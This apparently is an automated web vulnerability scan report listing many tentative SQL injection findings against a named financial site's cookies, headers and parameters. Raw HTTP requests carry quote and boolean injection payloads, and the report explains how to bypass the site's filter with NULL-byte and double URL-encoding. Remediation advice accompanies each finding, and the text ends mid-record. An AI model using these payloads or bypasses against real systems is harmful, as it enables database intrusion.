HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:16:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2> </body></html>
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Referer: http://www.google.com/search?hl=en&q=%00'
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:12 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2; Referer: http://www.google.com/search?hl=en&q=%00''
Response 2
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:16:13 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2> </body></html>
The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Sample cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:1a400" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Server: TK2MCWBA01 Date: Sun, 30 Jan 2011 02:13:55 GMT Connection: close
If you received this message in error, we apologize for the inconvenience.<BR> ...[SNIP]...
Request 2
GET /detail/stock_quote HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69%2527%2527; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:13:55 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 171
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price">here</a>.</h2> </body></html>
The expid cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the expid cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the expid cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /detail/stock_quote?Symbol=$INDU HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:19 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /detail/stock_quote?Symbol=$INDU HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2%2527%2527;
Response 2
HTTP/1.1 302 Found Connection: close Date: Sun, 30 Jan 2011 02:16:19 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET X-AspNet-Version: 2.0.50727 Location: http://investing.money.redacted/investments/stock-price?symbol=%24INDU Cache-Control: private Content-Type: text/html; charset=utf-8 Content-Length: 186
<html><head><title>Object moved</title></head><body> <h2>Object moved to <a href="http://investing.money.redacted/investments/stock-price?symbol=%24INDU">here</a>.</h2> </body></html>
1.26. http://redacted/detail/stock_quote [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://moneycentral.msn.com
Path:
/detail/stock_quote
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. The payloads '%20and%201%3d1--%20 and '%20and%201%3d2--%20 were each submitted in the name of an arbitrarily supplied request parameter. These two requests resulted in different responses, indicating that the input is being incorporated into a SQL query in an unsafe way.
Note that automated difference-based tests for SQL injection flaws can often be unreliable and are prone to false positive results. You should manually review the reported requests and responses to confirm whether a vulnerability is actually present.
Request 1
GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d1--%20=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:23 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /detail/stock_quote?Symbol=$INDU&1'%20and%201%3d2--%20=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2 (redirected)
HTTP/1.1 200 OK Content-Length: 3080 Content-Type: text/html Last-Modified: Wed, 04 Jun 2008 17:06:59 GMT Accept-Ranges: bytes ETag: "40a29a6665c6c81:153c9" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 02:16:24 GMT Connection: close
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /inc/Attributions.asp HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)' Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 02:16:17 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /inc/Attributions.asp HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)'' Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Connection: close Date: Sun, 30 Jan 2011 02:16:18 GMT Server: Microsoft-IIS/6.0 P3P:CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET cache-control: private pragma: no-cache Content-Length: 26240 Content-Type: text/html Expires: Sun, 30 Jan 2011 02:16:18 GMT Cache-control: private
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <tit ...[SNIP]...
The userCh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the userCh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the userCh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The s_sq cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the s_sq cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The CC cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CC cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the CC cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The MUID cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MUID cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MUID cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The CULTURE cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the CULTURE cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the CULTURE cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The v1st cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the v1st cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the v1st cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The SRCHHPGUSR cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the SRCHHPGUSR cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the SRCHHPGUSR cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
The REST URL parameter 2 appears to be vulnerable to SQL injection attacks. A single quote was submitted in the REST URL parameter 2, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
Request 1
GET /inc/css'/ww.css HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:05:50 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /inc/css''/ww.css HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 404 Not Found Content-Length: 10099 Content-Type: text/html Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 18:05:51 GMT Connection: close
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="en-US" lang="en-US"> <head> <title ...[SNIP]...
The User-Agent HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the User-Agent HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
Request 1
GET /inc/css/ww.css HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00' Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:05:47 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
GET /inc/css/ww.css HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)%00'' Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 2
HTTP/1.1 200 OK Content-Length: 458 Content-Type: text/css Last-Modified: Tue, 04 Jan 2011 02:38:39 GMT Accept-Ranges: bytes ETag: "9f373f7eb8abcb1:161bf" Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 18:05:48 GMT Connection: close
The Sample cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Sample cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by submitting a URL-encoded NULL byte (%00) before the characters that are being blocked.
Remediation detail
NULL byte bypasses typically arise when the application is being defended by a web application firewall (WAF) that is written in native code, where strings are terminated by a NULL byte. You should fix the actual vulnerability within the application code, and if appropriate ask your WAF vendor to provide a fix for the NULL byte bypass.
The MC1 cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the MC1 cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the MC1 cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT Accept-Ranges: bytes ETag: "803fbbe4b8abcb1:153c9" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:09:25 GMT Content-Length: 600
function _usrChGetCrnt(key) {var opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;} function _u ...[SNIP]...
The Referer HTTP header appears to be vulnerable to SQL injection attacks. A single quote was submitted in the Referer HTTP header, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the Referer HTTP header as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT Accept-Ranges: bytes ETag: "803fbbe4b8abcb1:153c9" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 19:55:24 GMT Content-Length: 600
function _usrChGetCrnt(key) {var opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;} function _u ...[SNIP]...
The __qca cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the __qca cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
HTTP/1.1 200 OK Content-Type: application/x-javascript Last-Modified: Tue, 04 Jan 2011 02:41:31 GMT Accept-Ranges: bytes ETag: "803fbbe4b8abcb1:153c9" Vary: Accept-Encoding Server: Microsoft-IIS/6.0 P3P: CP="BUS CUR CONo FIN IVDo ONL OUR PHY SAMo TELo" X-UA-Compatible: IE=7 X-Powered-By: ASP.NET Date: Sun, 30 Jan 2011 15:09:28 GMT Content-Length: 600
function _usrChGetCrnt(key) {var opt=g_enumUsrCh[key].toString(16),rx=new RegExp("(?:=|%26)".concat(opt,"%3d([a-f0-9]+)"));return(g_usrChSrc.search(rx)!=-1)?parseInt(RegExp.$1,16):0;} function _u ...[SNIP]...
The mh cookie appears to be vulnerable to SQL injection attacks. A single quote was submitted in the mh cookie, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the value of the mh cookie as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
1.44. http://redacted/investor/StockRating/srsmain.asp [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Tentative
Host:
http://moneycentral.msn.com
Path:
/investor/StockRating/srsmain.asp
Issue detail
The name of an arbitrarily supplied request parameter appears to be vulnerable to SQL injection attacks. A single quote was submitted in the name of an arbitrarily supplied request parameter, and a general error message was returned. Two single quotes were then submitted and the error message disappeared. You should review the contents of the error message, and the application's handling of other input, to confirm whether a vulnerability is present.
The application attempts to block SQL injection attacks but this can be circumvented by double URL-encoding the blocked characters - for example, by submitting %2527 instead of the ' character.
Remediation detail
There is probably no need to perform a second URL-decode of the name of an arbitrarily supplied request parameter as the web server will have already carried out one decode. In any case, the application should perform its input validation after any custom canonicalisation has been carried out.
Request 1
GET /investor/StockRating/srsmain.asp?1%2527=1 HTTP/1.1 Host: redacted Accept: */* Accept-Language: en User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0) Connection: close Cookie: CULTURE=EN-US; s_sq=%5B%5BB%5D%5D; Sample=69; MC1=V=3&GUID=b712e24ec89448628a94536a58b96d32; s_cc=true; CC=US; MUID=DC63BAA44C3843F38378B4BB213E0A6F; mh=MSFT; userCh=4=0&8=0&20=0; SRCHHPGUSR=AS=1; v1st=F66AF379BC0B14B4; __qca=P0-161320755-1294800573610; ATC_ID=173.193.214.243.1295383441535041; expid=id=8ff810466a3d46f787eed9b654c5ca3f&bd=2011-01-08T02:46:15.800&v=2;
Response 1 (redirected)
HTTP/1.1 503 Service Unavailable Content-Type: text/html Date: Sun, 30 Jan 2011 18:05:55 GMT Connection: close Content-Length: 28
<h1>Service Unavailable</h1>
Request 2
